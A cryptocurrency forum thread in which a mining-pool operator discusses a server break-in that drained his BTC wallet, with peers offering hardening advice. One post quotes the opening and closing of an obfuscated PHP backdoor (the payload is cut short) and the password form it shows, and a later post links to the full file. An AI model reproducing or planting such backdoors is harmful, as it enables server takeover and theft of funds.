Looks like my BTC wallet was hacked

[suprastan]

Mod_Security would most likely have prevented files from being uploaded and executed, which it sounds like happened here.

[Goldshredder]

Perhaps you could reach an arrangement with somebody like fcmatt, to do some private security consulting for you.  At the very least it would be a second layer, a second set of experienced eyes keeping watch on that side of your site.  I always feared right from the start the possibility of thieves coming against you as you became higher profile.

[El_Nickio]

Sorry for your troubles Tommo - I'd be happy for a zeroed account and a fresh start!

[dddbtc]

Interesting, I've also found a call to the file tompoolforum/library/lib.php, but I don't see this file in the vanilla forums project git. Viewing the file it looks like this:

<?php
$o="QAEAOzh3b3cKDQAjYnV1aHVYdWIAAHdodXNuaWAvMC48Cg1HdGIAAHNYamZgbmRYdnJoc2J0WHUAgHJ pc25qYi83AfFoZVh0c2Z1JABzLwDRI2oBkSc6J2J/d2toY2IAEy8gJ ... (about 40 thousand characters more) ... RsbGxsbGxsbGwpOw=="));return;?>

If I load the page the source looks like this:

<style type="text/css">
   input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
</style>
<form method="POST" action="">
   <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
   <input type="hidden" name="doing" value="login">
   <input type="submit" value="Login">
</form>

It renders as a password input field with a Login button.

I am a user of your pool. This is very unfortunate.  I have also been following the hack of the TomCoin portion for the past few days.  Please copy all of suspicious PHP source and make a pastebin.  I should be able to decrypt it and give you more information regarding the attack on your pool.

Thanks and Best of Luck!

[Tommo_Aus]

I am a user of your pool. This is very unfortunate.  I have also been following the hack of the TomCoin portion for the past few days.  Please copy all of suspicious PHP source and make a pastebin.  I should be able to decrypt it and give you more information regarding the attack on your pool.

Thanks and Best of Luck!

What would be a good place to upload it? I could put it in a zip file.

[Hushpupy]

Sorry for your troubles Tommo - I'd be happy for a zeroed account and a fresh start!

I will be happy to donate my miners on your pool for a day to help you build up your pool again. 38gh for a day. Let start a donation to Tom pool! Any else would like to make a miner donation to Tom pool?

[Tommo_Aus]

Heh many thanks but no need, I'll just get things back up and more secure then hope some miners return

I've removed the forum software, changed passwords, reviewed files in the web directories and blocked a heap of ports (about the only ones open now are for the web server, mining (stratum) and SSH access).

TomCoin is now up, should have the other pools and multipools up soon. I'm just taking this as an opportunity to load balance between the servers as running so many wallets on my server with lower disk I/O is hurting its performance.

[fcmatt]

Heh many thanks but no need, I'll just get things back up and more secure then hope some miners return

I've removed the forum software, changed passwords, reviewed files in the web directories and blocked a heap of ports (about the only ones open now are for the web server, mining (stratum) and SSH access).

TomCoin is now up, should have the other pools and multipools up soon. I'm just taking this as an opportunity to load balance between the servers as running so many wallets on my server with lower disk I/O is hurting its performance.

tommo, i am glad to see you up and running again.

perhaps i can message you in the future if i have any curious questions about your experiences running a multicoin pool?

[tertius993]

Good news.  My miner switched back automatically when the pool came back online.

[Tommo_Aus]

Thanks guys, I've just brought the individual pools and multipools back online, hopefully some smooth sailing from here!

Don't hesitate to contact me fcmatt, thanks for all your help identifying the point of entry you were spot on, I'd be glad to return the favour

[dddbtc]

I am a user of your pool. This is very unfortunate.  I have also been following the hack of the TomCoin portion for the past few days.  Please copy all of suspicious PHP source and make a pastebin.  I should be able to decrypt it and give you more information regarding the attack on your pool.

Thanks and Best of Luck!

What would be a good place to upload it? I could put it in a zip file.

http://www.zippyshare.com/ would work nicely. They don't have any ads or compulsory registration.

[creepywheepy]

Sorry to hear that. I wonder cause hacking is really a big problem - what is the best way to protect from hacks?

[Hushpupy]

Tom Pool is up and running again!!!!!

[dddbtc]

Tom Pool is up and running again!!!!

Have happily kept 30GH/s on tompool the entire time. Thankfully I am auto-withdrawing altcoins to cryptsy and not utilizing TomCoin.  Really glad to see the project wasn't closed due to the hack.

[Tommo_Aus]

I've uploaded the lib.php file to here:

http://www8.zippyshare.com/v/82893458/file.html

I'd greatly appreciate if someone could take a look at it just to make sure there isn't anything else I should worry about.

Checked my BTC wallet today and found another transaction, luckily it wasn't significant as everything else had been emptied out earlier... little shit ('scuse my French) going back for more. I did a file contents search and found another instance of it in my web dir under a different name. I'd moved all of the other wallets to another server earlier on so access was only available to the one wallet. I've since deleted this last instance of the craplication.

[fcmatt]

I've uploaded the lib.php file to here:

http://www8.zippyshare.com/v/82893458/file.html

I'd greatly appreciate if someone could take a look at it just to make sure there isn't anything else I should worry about.

Checked my BTC wallet today and found another transaction, luckily it wasn't significant as everything else had been emptied out earlier... little shit ('scuse my French) going back for more. I did a file contents search and found another instance of it in my web dir under a different name. I'd moved all of the other wallets to another server earlier on so access was only available to the one wallet. I've since deleted this last instance of the craplication.

You really need to remove everything from www dir and put back only what you know. Or list all files looking for newer dates, file creation times, files created by www instead of root or your normal user you edit files with,etc They tend to leave multiples of these backdoors for this exact reason.  i failed to mention this to you but i did say start www from scratch or review every file.

[Tommo_Aus]

You really need to remove everything from www dir and put back only what you know. Or list all files looking for newer dates, file creation times, files created by www instead of root or your normal user you edit files with,etc They tend to leave multiples of these backdoors for this exact reason.  i failed to mention this to you but i did say start www from scratch or review every file.

Yeah I checked through the files and creation dates, somehow I missed this one.

[pengoau]

I am a user of your pool. This is very unfortunate.  I have also been following the hack of the TomCoin portion for the past few days.  Please copy all of suspicious PHP source and make a pastebin.  I should be able to decrypt it and give you more information regarding the attack on your pool.

Thanks and Best of Luck!

What would be a good place to upload it? I could put it in a zip file.

Even tho I'm late...

A good file sharing site is:  mega.co.nz

Security suggestion: Implement 2 Factor Auth (now that the backdoor is known and gone) and mod_security to prevent hackers uploading files if they find a new backdoor.

Just my 2c worth...
Any money the hacker is watching this thread and found out about your pool from this forum.

Paranoid much?

Sucks to hear you got hacked tommo, good to hear you are persisting and this has been a worthwhile learning experience. At least only 10k or so of coins were stolen so there is no real need for clients to come after you. You don't need legal or financial problems to be added to your grief.

[Tommo_Aus]

Been a while since this happened but does this mean the coins are still sitting in the same address?

https://blockchain.info/address/1EEERRbx4v6TNxgHJNthgroKBQLhehgdRt

Really sucks seeing the coins there in limbo in someone else's account.

[AliceWonder]

Looks that way to me.